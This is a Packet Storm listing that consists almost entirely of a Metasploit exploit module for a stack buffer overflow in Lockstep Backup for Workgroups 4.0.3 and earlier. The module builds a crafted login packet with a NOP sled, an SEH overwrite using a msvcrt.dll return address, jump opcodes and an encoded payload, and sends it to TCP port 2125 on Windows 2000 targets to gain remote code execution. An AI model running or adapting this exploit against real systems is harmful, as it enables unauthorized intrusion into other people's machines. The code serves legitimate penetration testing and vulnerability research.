Lockstep Backup For Workgroups 4.0.3 Buffer Overflow

2017-09-14T00:00:00
ID PACKETSTORM:144158
Type packetstorm
Reporter James Fitts
Modified 2017-09-14T00:00:00

Description

                                        
                                            `require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Lockstep Backup for Workgroups <= 4.0.3',  
'Description' => %q{  
This module exploits a stack buffer overflow found in  
Lockstep Backup for Workgroups <= 4.0.3. The vulnerability  
is triggered when sending a specially crafted packet that  
will cause a login failure.  
},  
'Author' => [ 'james fitts' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: $',  
'References' =>  
[  
[ 'URL', 'http://secunia.com/advisories/50260/' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00",  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ECX',  
},  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[   
'Windows 2000 ALL EN',   
{   
# msvcrt.dll  
# pop ecx/ pop ecx/ retn  
'Ret' => 0x780146c0,   
}   
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Feb 11 2013'))  
  
register_options(  
[  
Opt::RPORT(2125),  
OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])  
], self.class )  
end  
  
def exploit  
connect  
  
uname = datastore['USERNAME']  
  
p = "\x90" * 16  
p << payload.encoded  
  
packet = rand_text_alpha_upper(10000)  
packet[0, 8] = "BFWCA\x01\x01\x00"  
packet[8, uname.length] = "#{uname}\x00"  
packet[73, p.length] = p  
packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8  
packet[7201, 4] = [target.ret].pack('V')  
packet[7205, 8] = "\x90" * 8  
packet[7213, 2] = "\xff\xe7" # jmp edi  
  
print_status("Trying target %s..." % target.name)  
  
sock.put(packet)  
  
handler  
disconnect  
end  
  
end  
  
`